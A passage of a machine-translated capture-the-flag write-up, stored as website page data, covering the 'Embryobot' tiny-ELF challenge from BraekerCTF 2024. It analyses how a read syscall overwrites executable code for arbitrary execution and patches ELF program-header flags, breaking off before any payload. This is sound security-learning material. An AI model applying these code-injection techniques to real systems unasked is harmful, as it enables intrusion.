{"componentChunkName":"component---src-templates-post-template-js","path":"/breaker-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"c37dbf80-93e0-56b3-9091-65cd6400bdd2","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/breaker-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in BraekerCTF 2024. The Tiny ELF challenges were particularly interesting, so I’m writing up my solutions.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#embryobotrevpwn\">Embryobot(Rev/Pwn)</a></li>\n<li><a href=\"#binary-shrinkrev\">Binary shrink(Rev)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"embryobotrevpwn\" style=\"position:relative;\"><a href=\"#embryobotrevpwn\" aria-label=\"embryobotrevpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Embryobot(Rev/Pwn)</h2>\n<blockquote>\n<p>“This part will be the head, ” the nurse explains. The proud android mother looks at her newborn for the first time. “However, ” the nurse continues, “we noticed a slight growing problem in its code. Don’t worry, we have a standard procedure for this. A human just needs to do a quick hack and it should continue to grow in no time.”</p>\n<p>The hospital hired you to perform the procedure. Do you think you can manage?</p>\n<p>The embryo is:\nf0VMRgEBAbADWTDJshLNgAIAAwABAAAAI4AECCwAAAAAAADo3////zQAIAABAAAAAAAAAACABAgAgAQITAAAAEwAAAAHAAAAABAAAA==</p>\n</blockquote>\n<p>Decoding the Base64 text given in the problem statement yields a very small 32-bit ELF binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 793px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2klEQVQI1z2OXUvCYABGd1P0ARIVFBFitlzpmiMbW23v3k1lzdLU5YScW18E0f+/P71XXTwX51wcHi31EtJwhLAFsRUSt2KEMUS2BkTtBHn1QHAxwG9KpPJ3ZxKnLnBOXKbWkNQQjIyQRA/wDq/RfsfvfCcrlrdPvEU5lXyh8Kes7p+pwoyPfk4p5qyDGT+PJZNOxM2uTnDUJTi26W6fY242MDcaWFtNtK+04FMFs17KWsWqOKcQGUtvonhBGS149WfqScjY7CNPHXq1S5y9Nu5+B/fAxN7R//cHpAZlxnGRXdAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/535c85337eb7fc1e0385193aa6add3e4/8ac56/image-20240225142119777.webp 240w,\n/static/535c85337eb7fc1e0385193aa6add3e4/d3be9/image-20240225142119777.webp 480w,\n/static/535c85337eb7fc1e0385193aa6add3e4/51ddc/image-20240225142119777.webp 793w\"\n              sizes=\"(max-width: 793px) 100vw, 793px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/535c85337eb7fc1e0385193aa6add3e4/8ff5a/image-20240225142119777.png 240w,\n/static/535c85337eb7fc1e0385193aa6add3e4/e85cb/image-20240225142119777.png 480w,\n/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png 793w\"\n            sizes=\"(max-width: 793px) 100vw, 793px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/535c85337eb7fc1e0385193aa6add3e4/73fd0/image-20240225142119777.png\"\n            alt=\"image-20240225142119777\"\n            title=\"image-20240225142119777\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Interestingly, the entry point address defined in the header corresponds to file offset 0x23.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d74fe/image-20240225142508200.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABIUlEQVQoz4WQzU6DQBhFWVitNliNxqrRIFClyH+BImBboGCkIm1SNXHj+7/FdWZEd9LFl5lcZg7nDvfmL1HIEYITHfHARnRmsZVmmRDg8dzB7HIMr6/C6d3C2pdhHwz/Ha42c+RSBLMrsQs0tLoyyz6CCrkY4uHUwPTCgX+kkm9SO3BlFXi5T2HuidA6AgNTi1wKsVTnmF95DEQPmw2szZKrjQWoZanM8KxMiY3O4PQna/sJybVP7GjlEezecHvlSktRaRlqI0elZwhJPWNXxKu+wFf6/geMBxbG/N124IrYUcONV7I3S0hFbUdAKkxI5YQB9M4Ns7aa52gbBqSwjVviM16TmgWDUbPJsQb3UCEzgssrbO+RPR33d+WbrP+TfQOYFc9EVOpaPgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/8ac56/image-20240225142508200.webp 240w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d3be9/image-20240225142508200.webp 480w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/e46b2/image-20240225142508200.webp 960w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/4b3db/image-20240225142508200.webp 1164w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/8ff5a/image-20240225142508200.png 240w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/e85cb/image-20240225142508200.png 480w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d9199/image-20240225142508200.png 960w,\n/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d74fe/image-20240225142508200.png 1164w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bc0c1df53ca36e2ebb692fdd64a0d9a9/d9199/image-20240225142508200.png\"\n            alt=\"image-20240225142508200\"\n            title=\"image-20240225142508200\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>We can also see that write and execute permissions are assigned to all regions, including the ELF header itself.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/c83ae/image-20240225150808957.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 16.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuElEQVQI123NyY6CUBCFYTa2w86BbmdB2iHNqOINFxQR0E603fn+r/I3EhM3Lr6cqkpOSknnIeki4rTck81iEi0k0SOiwZagu2aregjV5TD0ifsbjmNRCj8dgraFaJpI1Sb6chEtE+VmpVyXB+7+hb+fhGTkk00EcW+F7FisGgb2h4ZZmWBVtJJd1XFqU9y68fLcld/5vvwoVYdUC8o5n0pyXXKe7ciK2yNzI+RU2HW9omzgNb7f+gc+vlpEg5wXjwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/8ac56/image-20240225150808957.webp 240w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d3be9/image-20240225150808957.webp 480w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/e46b2/image-20240225150808957.webp 960w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/2baf0/image-20240225150808957.webp 1180w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/8ff5a/image-20240225150808957.png 240w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/e85cb/image-20240225150808957.png 480w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d9199/image-20240225150808957.png 960w,\n/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/c83ae/image-20240225150808957.png 1180w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6fcca7e48912a7c3e4ef3a5f3d7e413b/d9199/image-20240225150808957.png\"\n            alt=\"image-20240225150808957\"\n            title=\"image-20240225150808957\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It appears that this tiny binary is created by interpreting the bytes inside the ELF header as executable code.</p>\n<p>The technique for crafting such Tiny ELF binaries is described in the following articles:</p>\n<p>Reference: <a href=\"https://nathanotterness.com/2021/10/tiny_elf_modernized.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Tiny ELF Files: Revisited in 2021</a></p>\n<p>Reference: <a href=\"https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">A Whirlwind Tutorial on Creating Really Teensy ELF Executables for Linux</a></p>\n<p>This binary could not be disassembled properly with Ghidra, but using IDA we were able to obtain the following code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACDUlEQVQ4y41TCW7bMBD0/1/RF/QVLRIDiQO0CYq4TWJLtiUfokiJ1MFruqTkOAnstCssSJDc4WpmOOFpgs3dHbIfPyGr79jtvkLKX2iUQ9cZKNVDG4MQzjvwlseUvYyjaEVcD+G9x4QnS6xnswg6rscoCkXAGsVBQdRqLMDFCGARkC1ekE6nWN3cwBpNizZsgxUN6rrHnjPsyhLW+neF8Rvnb2NSvjwjubqiDmew2lD7w4HttobgLQ6HGk9/DmCsGX7buYs5dLjZIHl4wGY+hwmA40YlWjAhiUsDITT0uPdvQPqdlEA3eQ7rTiSW1NF8mWPPFNoG/x0THsCow/zxEc4ausURXxZ9byBVi6pu6XYfOQzrztnI83E8zoc9N6p8e4vt/T2UtGSRSD3a1qMsPWStYUxQuYsq972PabQnW3k0dE5rH2sG24w+3FKXAXC0HAF1pLInYb4hXX8B59O4PgAinus60MV4rQkXRpXT62tsyIve2ZMPyX+SbLPNJZaJQNMc9/zZPPkwG1ReB5VN4MJFHoVoIJSK3HSdjmMoDOOljBwGlZPVCusso+NvVVZ4WuzpKcroyd/kxSyvX819UWXGCqRJgozUDpwd+ShZj8WiQpoVyHcVnlc7ZKx8/1rOJAEypGmKjDoMqlk38KQ1Ivnn3uynPmyahhTkqKpqJHgA7Amc88EW+PBuPwP9C2yzjGcaDJgwAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a57a02d2b40e45de00cb1e682e47e521/8ac56/image-20240225142935715.webp 240w,\n/static/a57a02d2b40e45de00cb1e682e47e521/d3be9/image-20240225142935715.webp 480w,\n/static/a57a02d2b40e45de00cb1e682e47e521/84ccf/image-20240225142935715.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a57a02d2b40e45de00cb1e682e47e521/8ff5a/image-20240225142935715.png 240w,\n/static/a57a02d2b40e45de00cb1e682e47e521/e85cb/image-20240225142935715.png 480w,\n/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a57a02d2b40e45de00cb1e682e47e521/0012b/image-20240225142935715.png\"\n            alt=\"image-20240225142935715\"\n            title=\"image-20240225142935715\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As shown above, the code calls into the ELF header from the address designated as the entry point and executes the following instructions.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">3</span> <span class=\"token punctuation\">;</span> syscall number <span class=\"token number\">3</span> <span class=\"token punctuation\">(</span>sys_read<span class=\"token punctuation\">)</span>\nmov ebx<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span> <span class=\"token punctuation\">;</span> file descriptor <span class=\"token number\">0</span> <span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span>\npop ecx\nxor cl<span class=\"token punctuation\">,</span>cl\nmov edx<span class=\"token punctuation\">,</span><span class=\"token number\">0x18</span>\n<span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\nadd al<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\nadd eax<span class=\"token punctuation\">,</span><span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\nadd <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>eax</code></pre></div>\n<p>Here, the x86 <code class=\"language-text\">read</code> system call, represented as <code class=\"language-text\">ssize_t read(int fd, void buf[.count], size_t count);</code>, is invoked.</p>\n<p>Since 0x18 is stored in edx, the maximum input size is limited to 0x18 bytes.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/read.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">read(2) - Linux manual page</a></p>\n<p>Normally ecx holds the address of the buffer that receives the input bytes, but I wasn’t sure what address the sequence <code class=\"language-text\">pop ecx; xor cl,cl</code> would produce.</p>\n<p>First, let’s think about what value is on the top of the stack when <code class=\"language-text\">pop ecx</code> executes.</p>\n<p>Since this code is invoked via a <code class=\"language-text\">call</code> from the entry point, the stack top currently holds the return address (0x08048028).</p>\n<p>Then, <code class=\"language-text\">xor cl,cl</code> zeroes out only the least-significant byte of ecx’s address.</p>\n<p>From this, we can see that <code class=\"language-text\">pop ecx; xor cl,cl</code> effectively loads the image base into the ecx register.</p>\n<p>In other words, the input received by <code class=\"language-text\">read</code> is written into the 0x18-byte region starting from the image base 0x8048000.</p>\n<p>Since the next execution address after the system call is 0x8048010, it appears that we can achieve arbitrary code execution by overwriting the in-process executable code via <code class=\"language-text\">read</code>.</p>\n<p>However, a shellcode of this size alone is not sufficient to spawn a shell.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 564px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8ElEQVQY04WPzW7CMBCE8/6v00NfgKJK0FJVLRI0oVKAQDBx7NiJE/Lz1YQLh6odabQj7e7sbCA3G3azGfH0CXU4kUnHfqdwrqUsm7E2tdeuZqDniq5vkVWOsAJTG3KvZSVRThGoOCb9/ODwtsApxT1kVlEUNZVtEcJ6o57/EIgwZDt/4XsyxZwznwLathubQhi0cmhr2J5SykvJdaD3xjd2d/rGYDmPeH58Z/KwII6OGL+sfNKyNKxXe6LwyDZJWK5iFq8bf+SMMQVa618Z2PSIjL7IwjWNtWOyYRjGqnJHoWtq13FIDElS0Fy6P1/+AfKefm73eM4wAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/8ac56/image-20240225144538133.webp 240w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/d3be9/image-20240225144538133.webp 480w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/0a341/image-20240225144538133.webp 564w\"\n              sizes=\"(max-width: 564px) 100vw, 564px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/8ff5a/image-20240225144538133.png 240w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/e85cb/image-20240225144538133.png 480w,\n/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png 564w\"\n            sizes=\"(max-width: 564px) 100vw, 564px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ae44752d73e82479a1ae62d3e1a1d53f/ba4d9/image-20240225144538133.png\"\n            alt=\"image-20240225144538133\"\n            title=\"image-20240225144538133\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Let’s think about how to obtain a shell using this vulnerability.</p>\n<p>I wanted to verify the above assumptions with dynamic analysis in gdb, but due to the special structure of this challenge binary, gdb could not analyze it properly.</p>\n<p>Instead, I built the following assembly and analyzed that program.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token punctuation\">;</span> nasm <span class=\"token operator\">-</span>f elf32 tmp<span class=\"token punctuation\">.</span><span class=\"token keyword\">asm</span> <span class=\"token operator\">&amp;&amp;</span> ld <span class=\"token operator\">-</span>m elf_i386 <span class=\"token operator\">-</span>o tmp tmp<span class=\"token punctuation\">.</span>o\nsection <span class=\"token punctuation\">.</span>text\nglobal _start\n\nvlun<span class=\"token operator\">:</span>\n    mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">3</span>              <span class=\"token punctuation\">;</span> syscall number <span class=\"token number\">3</span> <span class=\"token punctuation\">(</span>sys_read<span class=\"token punctuation\">)</span>\n    mov ebx<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span>              <span class=\"token punctuation\">;</span> file descriptor <span class=\"token number\">0</span> <span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span>\n    pop ecx\n    xor cl<span class=\"token punctuation\">,</span>cl\n    mov edx<span class=\"token punctuation\">,</span><span class=\"token number\">0x18</span>\n    <span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\n    add al<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\n    add eax<span class=\"token punctuation\">,</span><span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span>\n    add <span class=\"token punctuation\">[</span>eax<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>eax\n\n_start<span class=\"token operator\">:</span>\n    call vlun\n    xor al<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span></code></pre></div>\n<p>However, when built with <code class=\"language-text\">nasm -f elf32 tmp.asm &amp;&amp; ld -m elf_i386 -s -o tmp tmp.o</code>, the ELF header region does not have write and execute permissions, so it cannot fully replicate the behavior of the challenge binary.</p>\n<p>To fix this, I read the byte at offset 0x4c — derived by adding 0x18 (the offset of the flags field within a 32-bit ELF program header) to the program header start obtained from ELF header offset 0x1C — and changed the flag value from 0x4 to 0x7.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 904px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABlUlEQVQ4y5WTSXKDMBBFfYxUmdkGxCDANnPKWaWyySFy/1P86LcRxs7GWXRJQurXvwd2SmUoigJt2+J0OolxTzufL3JX17XZnxFFETzPg+t6iONY3jRNgyAI5Lvv+9hleWGcSlwuFzE+suvQtej7Hmma4ng8iqOY7yLLMgm+DSRAlRUoS42u61YQH7XmfL5+yTc6uK6LMAwRhBGcuIQyQfI8lwC8I4xQo7BEVdUYhkGcqag1azfOaL5/5Hw4HMRRgNEBb/oKlcTQVSXBCLO2ywuNqm4wTaNAaYSM44Th49OsowD5+JZyCCdKRCFru1W4AmtT2HmexXlr79O4Am2NAqbm7KWGlVHIpimlNikTKAqnVSGNoMkE4f5R4a2jhLDehLKWmxoWaw3ZGGtM2357BjJFKuQ9z/v9XmACVFkOrSsMbIZxtjNooRa4prwAmSrvkiRZx2oZmwW4qNkCnxVaoE2ZUHaeQ27fvAzcKuQ+XbrsOI4o/pvyf4AGQD/+mjw/zOEd2L8E9AnwXASJhm5aM4/J/c7YL4m+hFBvkYBtAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2973eec5555b388c40f38ea3a2602c4d/8ac56/image-20240225152627792.webp 240w,\n/static/2973eec5555b388c40f38ea3a2602c4d/d3be9/image-20240225152627792.webp 480w,\n/static/2973eec5555b388c40f38ea3a2602c4d/82aba/image-20240225152627792.webp 904w\"\n              sizes=\"(max-width: 904px) 100vw, 904px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2973eec5555b388c40f38ea3a2602c4d/8ff5a/image-20240225152627792.png 240w,\n/static/2973eec5555b388c40f38ea3a2602c4d/e85cb/image-20240225152627792.png 480w,\n/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png 904w\"\n            sizes=\"(max-width: 904px) 100vw, 904px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2973eec5555b388c40f38ea3a2602c4d/d9217/image-20240225152627792.png\"\n            alt=\"image-20240225152627792\"\n            title=\"image-20240225152627792\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Using the same approach, I also patched the flags of the second program header.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Executable_and_Linkable_Format\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Executable and Linkable Format - Wikipedia</a></p>\n<p>This allowed us to assign write and execute permissions to both the ELF header region and the <code class=\"language-text\">.text</code> section in our custom binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 805px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABdklEQVQoz4VRyVLCQBTMQQSRotCSRdEKYZEYyAYkEFbZAgFEdjcsy4v//wftmxEPnjx09Zutu988wb7UYCV1OGIJtaQBO6rDjpc4nCsLlagJK1ZCMZiHErgllqGGFOhhBfWYjkZchxW5g3OhwghmIazLY2zLE2zKHnb2DF/eHpuKh1G2Tmhgkm/BTTuoR1W0EgaqZwrMkwwMguZPEyTorA6kOQt9qYYhPeyJVbi5JpoJExVytM8LME9zqJGzFVH4nhPVUA7LKB6nCBJUYtX/w0yYJ2SCb60lRTd47F6qil11hq5o48mZY64NuNG+vcKIeKp0saZuNtYED2ofs0KX1wPJIWEJAkvgyR3uKgtJLvQ5fMaa2n5tLPDeWWNVGuOjt8NL4xFbe0oCU37OjJemiy2tmRFLK3SuK/yBJ7exMFye6P7GwjBThx7IoHAkcueCT0TRlzq0ewCt1UOt/rbsxDSsaDAsqUt/yabG/o4d/gcz9PceG8o37TjXCTR+a5AAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/8ac56/image-20240225152717195.webp 240w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/d3be9/image-20240225152717195.webp 480w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/82ef0/image-20240225152717195.webp 805w\"\n              sizes=\"(max-width: 805px) 100vw, 805px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/8ff5a/image-20240225152717195.png 240w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/e85cb/image-20240225152717195.png 480w,\n/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png 805w\"\n            sizes=\"(max-width: 805px) 100vw, 805px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5ab780248328e9fa6af4d7f67a3c9a02/c946b/image-20240225152717195.png\"\n            alt=\"image-20240225152717195\"\n            title=\"image-20240225152717195\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing this program in gdb confirms, as expected, that the write buffer address at the time of the system call is set to the base address.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 833px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9a1022d837403ce7cb185de9c0535dfa/5205c/image-20240225152235545.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 49.16666666666667%; position: relative; bottom: 0; left: 0; background-image: 